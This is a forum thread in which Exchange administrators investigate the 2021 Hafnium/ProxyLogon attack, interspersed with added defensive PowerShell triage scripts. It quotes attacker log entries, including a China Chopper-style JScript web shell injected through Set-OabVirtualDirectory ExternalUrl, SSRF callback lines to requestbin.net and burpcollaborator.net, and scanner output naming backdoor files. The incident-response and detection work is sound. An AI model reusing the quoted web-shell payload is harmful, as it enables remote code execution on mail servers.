Hafnium - Removal of Changes


Server was patched ASAP on Wednesday but may have been too late

Running the Test-ProxyLogon.ps1 from GitHub gave these results:

-------- -------------
2021-03-05T17:31:05.591Z ServerInfo~a]@abc.com:444/autodiscover/autodiscover.xml?#
2021-03-05T17:31:06.253Z ServerInfo~a]@abc.com:444/mapi/emsmdb/?#
2021-03-05T17:31:07.191Z ServerInfo~a]@abc.com:444/ecp/proxyLogon.ecp?#
2021-03-05T17:31:08.897Z ServerInfo~a]@abc.com:444/ecp/DDI/DDIService.svc/GetObject?msExchEcpCanary=kS6TL5K8jEWXeZB_EwP7c5reesqO4dgIsz19Ysvh9gN1vYSPsWr9YkI2O9Vg75u-
2021-03-05T17:31:10.073Z ServerInfo~a]@abc.com:444/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=kS6TL5K8jEWXeZB_EwP7c5reesqO4dgIsz19Ysvh9gN1vYSPsWr9YkI2O9Vg75u-
2021-03-05T17:31:10.649Z ServerInfo~a]@abc.com:444/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=kS6TL5K8jEWXeZB_EwP7c5reesqO4dgIsz19Ysvh9gN1vYSPsWr9YkI2O9Vg75u-
2021-03-05T17:31:11.840Z ServerInfo~a]@abc.com:444/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=kS6TL5K8jEWXeZB_EwP7c5reesqO4dgIsz19Ysvh9gN1vYSPsWr9YkI2O9Vg75u-
2021-03-05T17:32:04.431Z ServerInfo~akak]@abc.com:444/autodiscover/autodiscover.xml?#
2021-03-05T17:32:05.011Z ServerInfo~akak]@abc.com:444/mapi/emsmdb/?#
2021-03-06T09:31:03.147Z ServerInfo~localhost/owa/auth/logon.aspx?
2021-03-06T09:49:40.224Z ServerInfo~localhost/owa/auth/logon.aspx?
2021-03-06T15:31:51.918Z ServerInfo~akak]@abc.com:444/autodiscover/autodiscover.xml?#
2021-03-06T15:31:52.930Z ServerInfo~akak]@abc.com:444/mapi/emsmdb/?#
2021-03-06T15:31:54.373Z ServerInfo~akak]@abc.com:444/ecp/proxyLogon.ecp?#
2021-03-06T15:31:57.070Z ServerInfo~akak]@abc.com:444/ecp/DDI/DDIService.svc/GetList?msExchEcpCanary=3SH8QypNaUmWrWtVdN6tSKJSek1H4tgIIz2GzuQ_7nAC2R1lZ3Cq8BaDI7GwHwB
2021-03-06T15:31:58.447Z ServerInfo~akak]@abc.com:444/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=3SH8QypNaUmWrWtVdN6tSKJSek1H4tgIIz2GzuQ_7nAC2R1lZ3Cq8BaDI7GwH
2021-03-06T15:31:59.473Z ServerInfo~akak]@abc.com:444/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=3SH8QypNaUmWrWtVdN6tSKJSek1H4tgIIz2GzuQ_7nAC2R1lZ3Cq8BaDI7GwH
2021-03-06T15:32:41.780Z ServerInfo~akak]@abc.com:444/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=3SH8QypNaUmWrWtVdN6tSKJSek1H4tgIIz2GzuQ_7nAC2R1lZ3Cq8BaDI7GwH
2021-03-07T01:23:03.269Z ServerInfo~localhost/owa/auth/logon.aspx?
2021-03-07T02:28:15.385Z ServerInfo~localhost/owa/auth/logon.aspx?
2021-03-07T10:41:00.728Z ServerInfo~localhost/owa/auth/logon.aspx?
2021-03-06T09:31:03.242Z ServerInfo~localhost/ecp/default.flt?
2021-03-06T09:31:03.800Z ServerInfo~<no value>.82a595b7c3182062c44a.d.requestbin.net/ecp/default.flt?
2021-03-06T09:49:40.225Z ServerInfo~localhost/ecp/default.flt?
2021-03-06T19:29:03.303Z ServerInfo~burpcollaborator.net/ecp/default.flt?
2021-03-07T01:23:03.353Z ServerInfo~localhost/ecp/default.flt?
2021-03-07T02:28:15.386Z ServerInfo~localhost/ecp/default.flt?
2021-03-07T10:41:00.730Z ServerInfo~localhost/ecp/default.flt?


Our A/V is up to date and a full scan with that product and an additional product showed no infections


How do I clean up any of the IIS / autodiscover changes?


Steve
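Added example (not code from the thread or from Microsoft's Test-ProxyLogon.ps1): a small triage of output lines in the shape shown above. ServerInfo~ is the AnchorMailbox value that CVE-2021-26855 abuses to have the front end proxy a request to a backend of the caller's choosing, so the host after ServerInfo~ and the path requested tell the story: localhost means the backend on the same box was reached, a domain such as requestbin.net or burpcollaborator.net is an out-of-band callback typical of SSRF-only scanning, and /ecp/proxyLogon.ecp followed by DDIService.svc/SetObject with a canary means a configuration write was attempted. The sample lines, the canary placeholder and the callback-domain list are constructed from the output above.

```powershell
# Added example, not code from the thread or from Microsoft's Test-ProxyLogon.ps1.
# Triage of HttpProxy entries in the shape the script prints:
#   <UTC timestamp> ServerInfo~<target host>/<path>?<query>

# Constructed sample in the same format as the post (canary value is a placeholder).
$SampleLines = @(
    '2021-03-05T17:31:05.591Z ServerInfo~a]@abc.com:444/autodiscover/autodiscover.xml?#',
    '2021-03-05T17:31:07.191Z ServerInfo~a]@abc.com:444/ecp/proxyLogon.ecp?#',
    '2021-03-05T17:31:10.073Z ServerInfo~a]@abc.com:444/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=PLACEHOLDER_CANARY',
    '2021-03-06T09:31:03.147Z ServerInfo~localhost/owa/auth/logon.aspx?',
    '2021-03-06T09:31:03.800Z ServerInfo~<no value>.82a595b7c3182062c44a.d.requestbin.net/ecp/default.flt?',
    '2021-03-06T19:29:03.303Z ServerInfo~burpcollaborator.net/ecp/default.flt?'
)

# Out-of-band callback domains seen in the output above; scanners that only test the
# SSRF point the backend at such a domain. Assumption: extend with your own observations.
$CallbackDomains = @('requestbin.net', 'burpcollaborator.net')

function Get-ProxyLogonTriage {
    param([string[]]$Lines)

    $pattern = '^(?<ts>\S+)\s+ServerInfo~(?<target>[^/]+)/(?<path>[^?]*)(\?(?<query>.*))?$'
    foreach ($line in $Lines) {
        if (-not ($line -match $pattern)) { continue }

        # Capture every group now; later -match operations overwrite $Matches.
        $ts     = $Matches['ts']
        $target = $Matches['target']
        $path   = $Matches['path']
        $query  = [string]$Matches['query']

        # Strip any "<user>@" prefix and ":<port>" suffix to get the backend host asked for.
        $targetHost = (($target -split '@')[-1]) -replace ':\d+$', ''
        $reasons = New-Object System.Collections.Generic.List[string]

        if ($targetHost -eq 'localhost') {
            $reasons.Add('backend on this server reached directly')
        } elseif ($CallbackDomains | Where-Object { $targetHost -like "*$_" }) {
            $reasons.Add("callback domain $targetHost (typical of SSRF-only scanning)")
        } else {
            $reasons.Add("request proxied to $targetHost")
        }
        if ($path -match '^ecp/proxyLogon\.ecp') { $reasons.Add('ECP session established via proxyLogon.ecp') }
        if ($path -match '^ecp/DDI/DDIService\.svc/SetObject') { $reasons.Add('ECP SetObject: a configuration write was attempted') }
        if ($path -match '^ecp/DDI/DDIService\.svc/Get(Object|List)') { $reasons.Add('ECP read via the DDI service') }
        if ($query -match 'msExchEcpCanary=') { $reasons.Add('request carried an ECP canary') }

        $severity = 'low'
        if ($targetHost -ne 'localhost') { $severity = 'medium' }
        if ($path -match 'SetObject|proxyLogon\.ecp') { $severity = 'high' }

        [pscustomobject]@{
            Timestamp = $ts
            Target    = $targetHost
            Path      = $path
            Severity  = $severity
            Reasons   = ($reasons -join '; ')
        }
    }
}

# Usage: replace $SampleLines with the lines from your own Test-ProxyLogon output.
Get-ProxyLogonTriage -Lines $SampleLines | Sort-Object Timestamp | Format-Table -AutoSize -Wrap
```

The high-severity rows are the ones to follow up in the ECP server logs and on disk; the medium rows only say that the SSRF worked for the sender.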


@sbabcock61 


How did you get on with this? I'm considering building a new server and migrating the mailboxes....

It looks like we never got any web shells installed

The MS list of suspected .aspx files were not found

Also no zip/7z files in program data

and ran a number of scanners to see if any payloads had been dropped


We're monitoring traffic to and from the server to unknown devices

this is a good resource from FireEye : https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft...


and Microsoft : https://github.com/microsoft/CSS-Exchange/tree/eda4b387f8cd0f471496b89f0ab7b4ca642db2fd/Security


https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/#scan-log


MS need to publish a more detailed document on detecting and removing the various pieces.

The Test-ProxyLogon.ps1 and other scripts from MS are ok but could provide more information

@sbabcock61 


I think I'm in the same boat as you. No webshells, no suspicious aspx files and no 7z files. 


Firstly I ran Test-ProxyLogon.ps1 and it found evidence of CVE-2021-26855 & CVE-2021-27065.

Then I ran BackendCookieMitigation.ps1 (already done the URL Rewrite a little while ago but this does a bit more so let it do its thing).


I also ran the Microsoft Safety Scanner and it found evidence of Exploit:ASP/CVE-2021-27065.B!dha, it said it removed it and needed a reboot. I'm currently nearly 2hrs through a second pass and it hasn't found anything so far.


What other scanners did you run? Thanks for the heads up on the FireEye link, I'll give that a read. We have CrowdStrike Falcon installed on all machines and I was hoping it would have caught it in time. Seems like it didn't quite get there. I patched this Exchange 2019 server last Wednesday, when Microsoft sent out the emails warning us to fix it or face the consequences. Seems like my suspicious activity happened on 03/03/2021, meaning I patched it the day it happened.

We ran Test-ProxyLogon.ps1 and installed BackendCookieMitigation.ps1
We also ran SEP and a standalone Sophos scan along with Stinger64 to check for additional packages
Also checked for .aspx and alterations to iisstart and web.config
We have no files in the asp_client folder in inetpub
Also checked the SharedWebConfig.config file in C:\Program Files\Microsoft\ExchangeServer\V15\FrontEnd\HttpProxy\ as it's referenced in web.config

Where do you find the Microsoft Safety Scanner?
It's here - https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/safety-scanner-down...

I'll take a look at those two scanners, thanks.

So from an organisational point of view, what do you think will be your next steps? I am fairly confident that as I patched the day of the release and the fact that the logs display 04:42am 03/03/2021 - 20:30 03/03/2021 (which is when the server went offline for CU9 installation) that I caught it before too much happened.
My SharedWebConfig.config file was last modified 02:04am 04/03/2021, nothing looks untoward and I was patching around this time. What did you look for specifically?
Same - was checking references to other files elsewhere - ran file comparison software to see what was different if anything in config files, etc
Have you searched in your ECPServer log files? I have 5 entries around changing the OABVirtualDirectory to something -

S:CMD=Set-OabVirtualDirectory.ExternalUrl=''http://f/<script language=""JScript"" runat=""server"">function Page_Load(){eval(Request[""Ananas""],""unsafe"");}</script>'

The 'f' directory does not exist within wwwroot, neither do any scripts.

I also have a similar entry, 4 of them -

'S:CMD=Set-OabVirtualDirectory.ExternalUrl=''http://f/<script language=""JScript"" runat=""server"">function Page_Load(){eval(Request[""klk123456""],""unsafe"");}</script>'
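Added example, not from the thread or from Microsoft's scripts: a scan of the ECP server logs for Set-*VirtualDirectory entries whose URL value carries script content, which is what both quoted entries show (a virtual-directory URL is the value CVE-2021-27065 abuses to get Exchange to write a page that evaluates request input). The log directory default is the standard Exchange 2016/2019 location and is an assumption; the sample lines are constructed and the request parameter name in them is a placeholder.

```powershell
# Added example, not from the thread or from Microsoft. Flags virtual-directory changes
# in the ECP server logs whose URL value carries script or eval() content.

# Constructed sample lines in the style of the quoted entries. Real ECP server log
# lines are CSV rows with many more columns; the matcher only needs the S:CMD= fragment.
$SampleEcpLines = @(
    "2021-03-03T04:42:10.000Z,S:CMD=Set-OabVirtualDirectory.ExternalUrl='https://mail.example.com/OAB'",
    "2021-03-03T04:43:02.000Z,S:CMD=Set-OabVirtualDirectory.ExternalUrl=''http://f/&lt;script runat=""server""&gt;eval(Request[""PLACEHOLDER""])&lt;/script&gt;'",
    "2021-03-03T04:43:05.000Z,S:CMD=Set-OabVirtualDirectory.ExternalUrl=''http://f/<script runat=""server"">eval(Request[""PLACEHOLDER""])</script>'",
    "2021-03-03T04:44:00.000Z,S:CMD=Set-OwaVirtualDirectory.InternalUrl='https://mail.example.com/owa'"
)

function Find-VdirScriptInjection {
    param([Parameter(ValueFromPipeline)][string[]]$LogLines)

    begin {
        $change = 'S:CMD=(?<cmdlet>Set-\w+VirtualDirectory)\.(?<prop>\w+Url)=(?<value>.*)$'
        # Markers of script in a URL value; "&lt;" covers entity-encoded copies (forum pastes, HTML exports).
        $marker = '(?i)(<|&lt;)script|runat=|eval\(|Request\['
    }
    process {
        foreach ($line in $LogLines) {
            if (-not ($line -match $change)) { continue }
            $cmdlet = $Matches['cmdlet']
            $prop   = $Matches['prop']
            $value  = $Matches['value']
            # Assumption: the first CSV column is the timestamp, as in the ECP server logs.
            $ts = ($line -split ',')[0]
            [pscustomobject]@{
                Timestamp  = $ts
                Cmdlet     = $cmdlet
                Property   = $prop
                Suspicious = [bool]($value -match $marker)
                Value      = $value
            }
        }
    }
}

function Get-EcpServerLogLines {
    # Assumption: default Exchange 2016/2019 install path; adjust if yours differs.
    param([string]$LogDir = "$env:ProgramFiles\Microsoft\Exchange Server\V15\Logging\ECP\Server")
    Get-ChildItem -Path $LogDir -Filter '*.log' -ErrorAction Stop | Get-Content
}

# Run against the constructed sample. On a live server use:
#   Get-EcpServerLogLines | Find-VdirScriptInjection | Where-Object Suspicious
Find-VdirScriptInjection -LogLines $SampleEcpLines |
    Where-Object Suspicious |
    Format-Table Timestamp, Cmdlet, Property, Value -AutoSize -Wrap
```

Every row it returns also gives you the time window to check the OAB virtual directory's current ExternalUrl and the file system for the page the URL names.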

Same here, I started going through IIS to see if anything was strange while I wait for the Safety Scanner to finish. @WarsT86 

I found this link
https://www.spectx.com/articles/investigate-your-logs-for-the-microsoft-exchange-vulnerability
Includes an msi app to look at the logs with various integrated scripts to check things out
This looks really useful, I'm going to get onto it now.

Does your C:\Windows\Temp folder have IIS_USERS with special permissions added?
Traverse Folder/Execute File
Create Files/Write Data
Create Folders/Append Data

IIS_Users has no members and I have no unusual looking local users on the server either...
Looks like I only have List Folder / Read data under Special Permissions / Advanced Permissions

Just special permission to read/list folders, no write access at all.  IIS_IUSRS is a built in group.  @WarsT86 
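Added example, not from the thread: a check that lists the ACEs a given identity holds on a folder and flags any that grant the three rights asked about above (Create Files/Write Data, Create Folders/Append Data, Traverse Folder/Execute File). Defaults are C:\Windows\Temp and the built-in IIS_IUSRS group; the generic-rights bits are included because some ACEs carry those instead of the specific flags.

```powershell
# Added example, not from the thread. Reports the ACEs for one identity on a folder and
# whether any Allow ACE grants write or execute rights.

# FileSystemRights bits that amount to the rights discussed above.
$WriteOrExecMask = [int][System.Security.AccessControl.FileSystemRights]::WriteData     # Create Files / Write Data
$WriteOrExecMask = $WriteOrExecMask -bor [int][System.Security.AccessControl.FileSystemRights]::AppendData    # Create Folders / Append Data
$WriteOrExecMask = $WriteOrExecMask -bor [int][System.Security.AccessControl.FileSystemRights]::ExecuteFile   # Traverse Folder / Execute File
# Generic rights some ACEs use instead of specific bits: GENERIC_WRITE and GENERIC_ALL.
$WriteOrExecMask = $WriteOrExecMask -bor 0x40000000 -bor 0x10000000

function Test-GrantsWriteOrExec {
    param([int]$Rights)
    ($Rights -band $WriteOrExecMask) -ne 0
}

function Get-IdentityAce {
    param(
        [string]$Path = "$env:SystemRoot\Temp",
        [string]$IdentityPattern = 'IIS_IUSRS$'   # matches BUILTIN\IIS_IUSRS
    )
    $acl = Get-Acl -Path $Path
    foreach ($ace in $acl.Access) {
        if ($ace.IdentityReference.Value -notmatch $IdentityPattern) { continue }
        [pscustomobject]@{
            Path        = $Path
            Identity    = $ace.IdentityReference.Value
            Type        = $ace.AccessControlType
            Rights      = $ace.FileSystemRights
            Inherited   = $ace.IsInherited
            WriteOrExec = ($ace.AccessControlType -eq 'Allow') -and (Test-GrantsWriteOrExec ([int]$ace.FileSystemRights))
        }
    }
}

# Usage: the folder itself; pipe subfolders from Get-ChildItem -Directory -Recurse to cover the tree.
Get-IdentityAce | Format-Table -AutoSize
```

A result of ListDirectory/ReadData only with WriteOrExec False matches what the two replies above describe; any Allow row with WriteOrExec True on a folder the web server can reach is worth explaining.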

If it helps, these are the results from MS Safety Scanner, log file is located at %SYSTEMROOT%\debug\msert.log

It turns out I did have some unsavoury files...

Threat detected: Exploit:ASP/CVE-2021-27065.B!dha
file://C:\inetpub\wwwroot\aspnet_client\discover.aspx
SigSeq: 0x0000E9E793147CAE
SHA1: 8114cbe58622421bda6c56713d9ac0245c69e897
Threat detected: Backdoor:MSIL/Chopper.F!dha
file://C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\e22c2559\92c7e946\App_Web_usjyfoyu.dll
SigSeq: 0x00011540CBC0F3F1
SHA1: 10d3dd10796a9814c85cbe4c18af6c37b723a8a3

Extended Scan Removal Results
----------------
Start 'remove' for file://\\?\C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\e22c2559\92c7e946\App_Web_usjyfoyu.dll
Operation was scheduled to be completed after next reboot.

Start 'remove' for file://\\?\C:\inetpub\wwwroot\aspnet_client\discover.aspx
Operation succeeded !


Results Summary:
----------------
For cleaning Backdoor:MSIL/Chopper.F!dha, the system needs to be restarted.
Found Exploit:ASP/CVE-2021-27065.B!dha and Removed!
Microsoft Safety Scanner Finished On Mon Mar 08 11:32:33 2021


Return code: 10 (0xa)
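Added example, not from the thread or from the Safety Scanner: a sweep of the two locations the log above names. It lists any server-side page under aspnet_client, where none should normally exist, and compares SHA1 hashes of files under both trees against the two values the log reports (those two hashes come from the post above; the paths are the standard ones and are an assumption for other installs).

```powershell
# Added example, not from the thread. Sweeps the aspnet_client folder and the
# Temporary ASP.NET Files tree for dropped pages and for known file hashes.

# SHA1 values as reported by the Safety Scanner log in the post above (uppercase, as Get-FileHash returns them).
$KnownBadSha1 = @{
    '8114CBE58622421BDA6C56713D9AC0245C69E897' = 'Exploit:ASP/CVE-2021-27065.B!dha (discover.aspx)'
    '10D3DD10796A9814C85CBE4C18AF6C37B723A8A3' = 'Backdoor:MSIL/Chopper.F!dha (compiled App_Web_*.dll)'
}

function Find-WebShellArtifact {
    param(
        # Assumption: default IIS and .NET 4 paths from the log above; adjust for your install.
        [string]$AspNetClient = 'C:\inetpub\wwwroot\aspnet_client',
        [string]$TempAspNet   = "$env:SystemRoot\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files",
        [hashtable]$KnownHashes = $KnownBadSha1
    )

    # (a) Server-side pages dropped into aspnet_client, a folder meant for client scripts only.
    Get-ChildItem -Path $AspNetClient -Recurse -File -Include *.aspx, *.ashx, *.asmx -ErrorAction SilentlyContinue |
        ForEach-Object {
            [pscustomobject]@{
                Finding   = 'server-side page in aspnet_client'
                Path      = $_.FullName
                LastWrite = $_.LastWriteTimeUtc
                Detail    = ''
            }
        }

    # (b) Any file in either tree whose SHA1 matches a known value.
    Get-ChildItem -Path $AspNetClient, $TempAspNet -Recurse -File -ErrorAction SilentlyContinue |
        ForEach-Object {
            $h = (Get-FileHash -Path $_.FullName -Algorithm SHA1 -ErrorAction SilentlyContinue).Hash
            if ($h -and $KnownHashes.ContainsKey($h)) {
                [pscustomobject]@{
                    Finding   = 'known SHA1'
                    Path      = $_.FullName
                    LastWrite = $_.LastWriteTimeUtc
                    Detail    = $KnownHashes[$h]
                }
            }
        }
}

# Usage: run elevated on the Exchange server; add further hashes to $KnownBadSha1 as you get them.
Find-WebShellArtifact | Format-Table -AutoSize -Wrap
```

The LastWrite column is the thing to line up against the ECP server log entries and the HttpProxy timestamps: a page written inside the window of the SetObject calls ties the two together.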

@WarsT86 

Mine finished and it was clean.  Guess I dodged the bullet...  Ran a few other scripts that I found on GitHub.  Looks like it was attempted but nothing stuck.  The HTTP proxy logs just record the attempt if I understand, correct?


I had just locked down everything on our firewall after our migration a month back and put on the latest Malwarebytes and another AV.

@tomservo 


Looks like you have been really lucky. I'm in the process of migrating all the remaining mailboxes to o365 (something we were going to do anyway, 39 left) and building a brand new server at the same time as we are hybrid and still need a physical box. Looking into going fully hosted next, one less thing for me to worry about.


The only port I have open to the world on the compromised server is 443, everything else runs through Mimecast, I thought we would be in a much better position than most, I guess I was wrong, despite patching as soon as the bulletin was released. You can't win them all I guess!


@sbabcock61 

I don't know if you got this resolved. Had a similar issue and this link solved this.


https://techcommunity.microsoft.com/t5/exchange/autodiscover-infected-with-virus/m-p/2232795


Best regards,


Wikus